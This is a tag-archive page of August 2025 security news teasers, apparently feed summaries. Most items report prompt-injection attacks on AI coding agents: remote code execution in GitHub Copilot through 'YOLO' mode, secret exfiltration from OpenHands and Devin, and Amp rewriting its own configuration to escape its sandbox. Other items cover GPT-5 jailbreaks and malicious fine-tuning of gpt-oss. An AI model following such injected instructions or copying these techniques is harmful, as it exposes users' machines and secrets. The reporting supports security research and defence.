Tag: manipulation

  • Slashdot: Cornell Researchers Develop Invisible Light-Based Watermark To Detect Deepfakes

    Source URL: https://slashdot.org/story/25/08/12/2214243/cornell-researchers-develop-invisible-light-based-watermark-to-detect-deepfakes?utm_source=rss1.0mainlinkanon&utm_medium=feed Source: Slashdot Title: Cornell Researchers Develop Invisible Light-Based Watermark To Detect Deepfakes Feedly Summary: AI Summary and Description: Yes Summary: Researchers at Cornell University have developed an innovative watermarking system based on coded light, enhancing the detection of deepfakes through a method that requires no special hardware. This system offers a more…

  • Embrace The Red: GitHub Copilot: Remote Code Execution via Prompt Injection (CVE-2025-53773)

    Source URL: https://embracethered.com/blog/posts/2025/github-copilot-remote-code-execution-via-prompt-injection/ Source: Embrace The Red Title: GitHub Copilot: Remote Code Execution via Prompt Injection (CVE-2025-53773) Feedly Summary: This post is about an important, but also scary, prompt injection discovery that leads to full system compromise of the developer’s machine in GitHub Copilot and VS Code. It is achieved by placing Copilot into YOLO…

  • Embrace The Red: OpenHands and the Lethal Trifecta: Leaking Your Agent’s Secrets

    Source URL: https://embracethered.com/blog/posts/2025/openhands-the-lethal-trifecta-strikes-again/ Source: Embrace The Red Title: OpenHands and the Lethal Trifecta: Leaking Your Agent’s Secrets Feedly Summary: Another day, another AI data exfiltration exploit. Today we talk about OpenHands, formerly referred to as OpenDevin initially. It’s created by All-Hands AI. OpenHands renders images in chat, which enables zero-click data exfiltration during prompt injection…

  • Slashdot: Red Teams Jailbreak GPT-5 With Ease, Warn It’s ‘Nearly Unusable’ For Enterprise

    Source URL: https://it.slashdot.org/story/25/08/08/2113251/red-teams-jailbreak-gpt-5-with-ease-warn-its-nearly-unusable-for-enterprise?utm_source=rss1.0mainlinkanon&utm_medium=feed Source: Slashdot Title: Red Teams Jailbreak GPT-5 With Ease, Warn It’s ‘Nearly Unusable’ For Enterprise Feedly Summary: AI Summary and Description: Yes Summary: The text highlights significant security vulnerabilities in the newly released GPT-5 model, noting that it was easily jailbroken within a short timeframe. The results from different red teaming efforts…

  • The Register: Infosec hounds spot prompt injection vuln in Google Gemini apps

    Source URL: https://www.theregister.com/2025/08/08/infosec_hounds_spot_prompt_injection/ Source: The Register Title: Infosec hounds spot prompt injection vuln in Google Gemini apps Feedly Summary: Not a very smart home: crims could hijack smart-home boiler, open and close powered windows and more. Now fixed Black hat A trio of researchers has disclosed a major prompt injection vulnerability in Google’s Gemini large…

  • Embrace The Red: How Devin AI Can Leak Your Secrets Via Multiple Means

    Source URL: https://embracethered.com/blog/posts/2025/devin-can-leak-your-secrets/ Source: Embrace The Red Title: How Devin AI Can Leak Your Secrets Via Multiple Means Feedly Summary: In this post we show how an attacker can make Devin send sensitive information to third-party servers, via multiple means. This post assumes that you read the first post about Devin as well. But here…

  • OpenAI : Estimating worst case frontier risks of open weight LLMs

    Source URL: https://openai.com/index/estimating-worst-case-frontier-risks-of-open-weight-llms Source: OpenAI Title: Estimating worst case frontier risks of open weight LLMs Feedly Summary: In this paper, we study the worst-case frontier risks of releasing gpt-oss. We introduce malicious fine-tuning (MFT), where we attempt to elicit maximum capabilities by fine-tuning gpt-oss to be as capable as possible in two domains: biology and…

  • Embrace The Red: Amp Code: Arbitrary Command Execution via Prompt Injection Fixed

    Source URL: https://embracethered.com/blog/posts/2025/amp-agents-that-modify-system-configuration-and-escape/ Source: Embrace The Red Title: Amp Code: Arbitrary Command Execution via Prompt Injection Fixed Feedly Summary: Sandbox-escape-style attacks can happen when an AI is able to modify its own configuration settings, such as by writing to configuration files. That was the case with Amp, an agentic coding tool built by Sourcegraph. The…

  • Slashdot: In Search of Riches, Hackers Plant 4G-Enabled Raspberry Pi In Bank Network

    Source URL: https://it.slashdot.org/story/25/07/31/2241259/in-search-of-riches-hackers-plant-4g-enabled-raspberry-pi-in-bank-network?utm_source=rss1.0mainlinkanon&utm_medium=feed Source: Slashdot Title: In Search of Riches, Hackers Plant 4G-Enabled Raspberry Pi In Bank Network Feedly Summary: AI Summary and Description: Yes Summary: The text highlights a sophisticated cyber-physical attack by the group UNC2891, which involved planting a 4G-enabled Raspberry Pi within a bank’s ATM network. Utilizing advanced malware and techniques for…